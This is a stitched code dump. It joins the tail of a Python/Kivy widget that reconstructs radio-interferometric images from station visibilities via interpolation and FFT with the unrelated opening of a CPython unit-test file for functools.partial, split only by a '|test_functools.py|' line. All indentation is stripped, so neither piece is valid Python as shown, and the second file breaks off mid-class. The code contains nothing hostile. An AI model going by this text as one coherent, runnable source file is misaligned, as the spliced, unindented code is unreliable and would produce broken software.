print("InteractivePlotWidget.zoom_in:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def zoom_out(self) :
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_out:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def resize(self,widget,newsize) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.resize:",newsize)
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = self.default_zoom_factor*max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
# def set_zoom_factor(self,value) :
# self.rect.size = self.check_size([self.nx*value,self.ny*value])
# x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
# y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
# self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
# for i in range(0,8,2) :
# self.tex_coords[i] = self.tex_coords[i] + x_shift
# self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
# self.tex_coords = self.check_boundaries(self.tex_coords)
# self.rect.tex_coords = self.tex_coords
# self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def set_zoom_factor(self,value) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.set_zoom_factor:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.nx*value,self.ny*value))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.set_zoom_factor:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def check_boundaries(self,tex_coords) :
new_tex_coords = [0]*len(tex_coords)
max_x_shift = max((self.rect.size[0]-self.width)/self.rect.size[0],0)
new_tex_coords[0] = max(min(tex_coords[0],max_x_shift),0)
new_tex_coords[2] = max(min(tex_coords[2],1+max_x_shift),1)
new_tex_coords[4] = max(min(tex_coords[4],1+max_x_shift),1)
new_tex_coords[6] = max(min(tex_coords[6],max_x_shift),0)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl start"%(time.perf_counter()))
# print("Started update_mpl in thread")
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl generated mpl"%(time.perf_counter()))
# print("Made mpl plot in update_mpl in thread")
canvas.draw()
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl drew canvas"%(time.perf_counter()))
# print("Drew canvas in update_mpl in thread")
# self.buf = np.asarray(canvas.buffer_rgba()).ravel()
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl cast to buf"%(time.perf_counter()))
# print("Assigned buf in update_mpl in thread")
# self.arr = array('B', self.buf)
# self.arr = bytearray(self.buf)
self.arr = bytearray(np.asarray(canvas.buffer_rgba()).ravel())
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl cast to byte array"%(time.perf_counter()))
# print("Assigned arr in update_mpl in thread")
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
# print("Finished update_mpl in thread")
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl done"%(time.perf_counter()))
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
pass
class InteractiveImageReconstructionPlot(InteractivePlotWidget) :
def __init__(self,**kwargs) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.__init__ start"%(time.perf_counter()))
self.xarr = 0
self.yarr = 0
self.Iarr = 1
self.ddict = {}
self.sdict = {}
# self.argument_hash = None
super().__init__(**kwargs)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.__init__ done"%(time.perf_counter()))
##########
# Low-level image reconstruction function
def reconstruct_image(self,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,f=2,method='cubic',make_hermitian=False,ad_hoc_phasing=False) :
# print("Started image reconstruction in thread")
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image start"%(time.perf_counter()))
# Useful constant
uas2rad = np.pi/180.0/3600e6
# Exclude stations not in array
stations = list(np.unique(np.array(list(statdict.keys()))))
keep = np.array([ (datadict['s1'][j] in stations) and (datadict['s2'][j] in stations) for j in range(len(datadict['s1'])) ])
ddtmp = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddtmp[key] = datadict[key][keep]
if (len(ddtmp['u'])==0) :
return None,None,None
# Exclude stations that are "off"
keep = np.array([ statdict[ddtmp['s1'][j]]['on'] and statdict[ddtmp['s2'][j]]['on'] for j in range(len(ddtmp['s1'])) ])
ddnew = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddtmp[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Exclude data points outside the specified time range
if (not time_range is None) :
keep = (ddnew['t']>=time_range[0])*(ddnew['t']<time_range[1])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Cut points with S/N less than the specified minimum value
if (not snr_cut is None) and snr_cut>0:
# Get a list of error adjustments based on stations
diameter_correction_factor = {}
for s in stations :
if (statdict[s]['exists']) :
diameter_correction_factor[s] = 1.0
else :
diameter_correction_factor[s] = statdict[s]['diameter']/ngeht_diameter
# Baseline-by-baseline filtering
# keep = np.array([ np.abs(ddnew['V'][j])/(ddnew['err'][j].real * diameter_correction_factor[ddnew['s1'][j]] * diameter_correction_factor[ddnew['s2'][j]]) > snr_cut for j in range(len(ddnew['s1'])) ])
# Ad hoc phasing
keep = np.array([True]*len(ddnew['s1']))
jtot = np.arange(ddnew['t'].size)
for tscan in np.unique(ddnew['t']) :
inscan = (ddnew['t']==tscan)
s1_scan = ddnew['s1'][inscan]
s2_scan = ddnew['s2'][inscan]
snr_scan = np.array([ ddnew['V'][inscan][j]/( ddnew['err'][inscan][j] * diameter_correction_factor[s1_scan[j]] * diameter_correction_factor[s2_scan[j]] ) for j in range(len(s1_scan)) ])
detection_station_list = []
for ss in np.unique(np.append(s1_scan,s2_scan)) :
snr_scan_ss = np.append(snr_scan[s1_scan==ss],snr_scan[s2_scan==ss])
if np.any(snr_scan_ss > snr_cut ) :
detection_station_list.append(ss)
keep[jtot[inscan]] = np.array([ (s1_scan[k] in detection_station_list) and (s2_scan[k] in detection_station_list) for k in range(len(s1_scan)) ])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Double up data to make V hemitian
if (make_hermitian) :
ddnew['u'] = np.append(ddnew['u'],-ddnew['u'])
ddnew['v'] = np.append(ddnew['v'],-ddnew['v'])
ddnew['V'] = np.append(ddnew['V'],np.conj(ddnew['V']))
if (len(ddnew['u'])<=2) :
return None,None,None
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image station selection done"%(time.perf_counter()))
# Get the region on which to compute gridded visibilities
umax = np.max(ddnew['u'])
vmax = np.max(ddnew['v'])
u2,v2 = np.meshgrid(np.linspace(-f*umax,f*umax,256),np.linspace(-f*vmax,f*vmax,256))
# SciPy
# pts = np.array([ddnew['u'],ddnew['v']]).T
# V2r = si.griddata(pts,np.real(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# V2i = si.griddata(pts,np.imag(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# Maptlotlib
triang = tri.Triangulation(ddnew['u'], ddnew['v'])
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image triangulation done"%(time.perf_counter()))
if (method=='linear') :
V2r = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.real(ddnew['V']))(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.imag(ddnew['V']))(u2,v2),fill_value=0.0))
elif (method=='cubic') :
# V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.real(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
# V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.imag(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, ddnew['V'].real,kind='geom')(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, ddnew['V'].imag,kind='geom')(u2,v2),fill_value=0.0))
else :
print("ERROR: method %s not implemented"%(method))
V2 = V2r + 1.0j*V2i
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image interpolation done"%(time.perf_counter()))
### Filter to smooth at edges
# Cosine filter
# V2 = V2 * np.cos(u2/umax*0.5*np.pi) * np.cos(v2/vmax*0.5*np.pi)
# Blackman filter
# hu = 0.42 - 0.5*np.cos(2.0*np.pi*(u2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(u2+umax)/(2*umax))
# hv = 0.42 - 0.5*np.cos(2.0*np.pi*(v2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(v2+umax)/(2*umax))
# V2 = V2*hu*hv
# Gaussian beam filter
uvmax2 = np.max(ddnew['u']**2+ddnew['v']**2)
gaussian_filter = np.exp(-np.pi**2*(u2**2+v2**2)/(4.0*np.log(2.0)*uvmax2))
V2 = V2*gaussian_filter
# Generate the x,y grid on which to image
x1d = np.fft.fftshift(np.fft.fftfreq(u2.shape[0],d=(u2[1,1]-u2[0,0])*1e9)/uas2rad)
y1d = np.fft.fftshift(np.fft.fftfreq(v2.shape[1],d=(v2[1,1]-v2[0,0])*1e9)/uas2rad)
xarr,yarr = np.meshgrid(-x1d,-y1d)
# Compute image estimate via FFT
Iarr = np.fft.fftshift(np.real(np.fft.ifft2(np.fft.ifftshift(V2))))
# Iarr = np.fft.fftshift(np.abs(np.fft.ifft2(np.fft.ifftshift(V2))))
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image iFFT done"%(time.perf_counter()))
# print("Finished image reconstruction in thread")
# Return
return xarr,yarr,Iarr
def estimate_dynamic_range(self,x,y,I) :
peak_flux = np.max(I)
peak_negative_flux = np.max(np.maximum(-I,0.0))
return peak_flux/peak_negative_flux
def generate_mpl_plot(self,fig,ax,**kwargs) :
if (__cheap_image_debug__) :
print("InteractiveImageReconstructionPlot.generate_mpl_plot: start")
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
# You probably want, but do not require, the following in your over-lay
self.plot_image_reconstruction(ax,self.ddict,self.sdict,**kwargs)
ax.set_facecolor((0,0,0,1))
fig.set_facecolor((0,0,0,1))
def update(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
# print("Started update, initiating thread:",kwargs)
self.update_mpl(**kwargs)
# # create the thread to invoke other_func with arguments (2, 5)
# andrews_specific_name = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# andrews_specific_name.daemon = True
# # start the thread
# andrews_specific_name.start()
# # wait for end for now
# andrews_specific_name.join()
# #time.sleep(10) # HACK
# print("Finished update, should have finished thread")
def replot(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
self.update_mpl(**kwargs)
# print("Started replot, initiating thread")
# # create the thread to invoke other_func with arguments (2, 5)
# t = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# # t.daemon = True
# # start the thread
# t.start()
# # wait for end for now
# t.join()
# print("Finished replot, should have finished thread")
def check_boundaries(self,tex_coords) :
return tex_coords
def check_size(self,size) :
if (size[0]<self.width) :
size = (self.width, size[1]/size[0] * self.width)
elif (size[1]<self.height) :
size = (size[0]/size[1] * self.height, self.height)
return size
############
# High-level plot generation
def plot_image_reconstruction(self,axs,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,limits=None,show_map=True,show_contours=True) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction start"%(time.perf_counter()))
if (len(statdict.keys())==0) :
return
# Reconstruct image
self.xarr,self.yarr,self.Iarr=self.reconstruct_image(datadict,statdict,time_range=time_range,snr_cut=snr_cut,ngeht_diameter=ngeht_diameter)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction reconstruction done"%(time.perf_counter()))
self.replot_image_reconstruction(axs,time_range=time_range,limits=limits,show_map=show_map,show_contours=show_contours)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction done"%(time.perf_counter()))
############
# High-level plot generation
def replot_image_reconstruction(self,axs,time_range=None,limits=None,show_map=True,show_contours=True) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction start"%(time.perf_counter()))
if (self.Iarr is None) :
axs.text(0.5,0.5,"Insufficient Data!",color='w',fontsize=24,ha='center',va='center')
return
# Plot linear image
if (show_map) :
axs.imshow(self.Iarr,origin='lower',extent=[self.xarr[0,0],self.xarr[0,-1],self.yarr[0,0],self.yarr[-1,0]],cmap='afmhot',vmin=0,interpolation='spline16')
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction image plotted"%(time.perf_counter()))
# Plot the log contours
if (show_contours) :
lI = np.log10(np.maximum(0.0,self.Iarr)/np.max(self.Iarr)+1e-20)
lmI = np.log10(np.maximum(0.0,-self.Iarr)/np.max(self.Iarr)+1e-20)
lev10lo = max(np.min(lI[self.Iarr>0]),-4)
lev10 = np.sort( -np.arange(0,lev10lo,-1) )
axs.contour(self.xarr,self.yarr,-lI,levels=lev10,colors='cornflowerblue',alpha=0.5)
#plt.contour(self.x,self.y,-lmI,levels=lev10,colors='green',alpha=0.5)
lev1 = []
for l10 in -lev10[1:] :
lev1.extend( np.log10(np.array([2,3,4,5,6,7,8,9])) + l10 )
lev1 = np.sort(-np.array(lev1))
axs.contour(self.xarr,self.yarr,-lI,levels=lev1,colors='cornflowerblue',alpha=0.5,linewidths=0.5)
axs.contour(self.xarr,self.yarr,-lmI,levels=lev1[-10:],colors='green',alpha=0.5,linewidths=0.5)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction contours plotted"%(time.perf_counter()))
# Fix the limits
if (not limits is None) :
axs.set_xlim((limits[0],limits[1]))
axs.set_ylim((limits[2],limits[3]))
else :
xmin = min(np.min(self.xarr[lI>-2]),np.min(self.yarr[lI>-2]))
xmax = max(np.max(self.xarr[lI>-2]),np.max(self.yarr[lI>-2]))
axs.set_xlim((xmax,xmin))
axs.set_ylim((xmin,xmax))
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction done"%(time.perf_counter()))
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations, chain
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
